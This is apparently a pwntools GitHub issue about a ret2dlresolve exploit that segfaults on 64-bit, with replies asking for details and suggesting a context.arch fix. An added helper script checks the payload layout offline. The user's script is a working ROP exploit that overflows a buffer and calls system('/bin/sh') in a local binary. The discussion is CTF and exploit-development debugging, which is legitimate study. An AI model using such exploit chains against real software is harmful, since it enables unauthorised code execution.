Gallopsled / pwntools

CTF framework and exploit development library
http://pwntools.com

ret2dlresolve segfaulting. #2417

Open rectanglestuff opened 5 months ago

rectanglestuff commented 5 months ago

I get a segfault for 64-bit; `64+context.bytes` is 72, and this seems to be the correct offset for the 64-bit example.

On 32-bit, `p.send(fit({76: rop.chain(), 200: dlresolve.payload}))` still gets a shell.

```python
from pwn import *

# Setting context.binary also sets context.arch/bits from the ELF header.
context.binary = elf = ELF('./main')
rop = ROP(elf)
# Fake relocation/symbol structures that make the dynamic linker resolve "system".
dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["/bin/sh"])

# First stage: read the dlresolve structures into the address they were built for.
rop.read(0, dlresolve.data_addr)
# Second stage: call PLT0 with the fake reloc index so system("/bin/sh") is resolved and invoked.
rop.ret2dlresolve(dlresolve)

raw_rop = rop.chain()
print(rop.dump())
print(64+context.bytes)

p = elf.process()
# Overwrite the saved return address at 64+context.bytes; the dlresolve data goes at offset 200.
p.sendline(fit({64+context.bytes:rop.chain(), 200:dlresolve.payload}))
p.interactive()
```
Arusekk commented 5 months ago

Thank you for contributing to pwntools. In order for us to be able to help you, we need more information.

  1. What have you done?
  2. What did you expect?
  3. What happened instead?
  4. What version of pwntools are you using (`pwn version`), what scripts and binaries have you used, can we reproduce it too?
RocketMaDev commented 5 months ago

Try adding `context.arch = 'amd64'` at line 3? Pwntools has 32-bit and 64-bit payloads, and 32-bit is the default option.
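To make the layout of the script above inspectable without the binary, here is an added example (not from the issue, and not pwntools' own `fit`): a stand-in for `fit({offset: data})` that lays the ROP chain at `64+context.bytes` and the resolver data at 200, refuses overlapping pieces, and reports how much slack is left between the two for a 4-byte versus an 8-byte word size. The chain and payload lengths are constructed values, not taken from the report.

```python
# Added example, not from the issue or from pwntools itself: a small stand-in for
# pwnlib.util.packing.fit() so the payload layouts in the report can be inspected
# offline, without the binary. `word_size` plays the role of context.bytes
# (4 for i386, 8 for amd64); chain and payload lengths below are constructed.

def fit_like(pieces, filler=b"A"):
    """Place each bytes value at its integer offset, padding gaps with `filler`.

    Like fit({offset: data}), but raises instead of silently letting a later
    piece start inside an earlier one, which is one way a ROP chain that grew
    past the next offset can corrupt the ret2dlresolve data and segfault.
    """
    out = bytearray()
    for off, data in sorted(pieces.items()):
        if off < len(out):
            raise ValueError(f"piece at {off} starts inside data ending at {len(out)}")
        out += filler * (off - len(out))
        out += data
    return bytes(out)


def chain_offset(word_size):
    """The 64+context.bytes offset used in the report, for a given word size."""
    return 64 + word_size


def check_layout(chain, resolve_payload, word_size, payload_offset=200):
    """Lay out the two pieces exactly as the report does and return
    (total_length, slack), where slack is the number of bytes between the end
    of the ROP chain and the start of the resolver payload."""
    off = chain_offset(word_size)
    buf = fit_like({off: chain, payload_offset: resolve_payload})
    slack = payload_offset - (off + len(chain))
    return len(buf), slack


if __name__ == "__main__":
    # Constructed stand-ins: a 12-word chain and a 40-byte resolver payload.
    chain64 = b"".join(i.to_bytes(8, "little") for i in range(12))
    payload = b"P" * 40
    print("amd64 (total, slack):", check_layout(chain64, payload, word_size=8))
    # The same 12 words on i386 are half the size, so the chain ends earlier.
    chain32 = b"".join(i.to_bytes(4, "little") for i in range(12))
    print("i386  (total, slack):", check_layout(chain32, payload, word_size=4))
```

The report's working 32-bit offset is 76, not 64+4, so the distance from the buffer to the saved return address is a property of the compiled binary; the word size only decides how large each chain entry is.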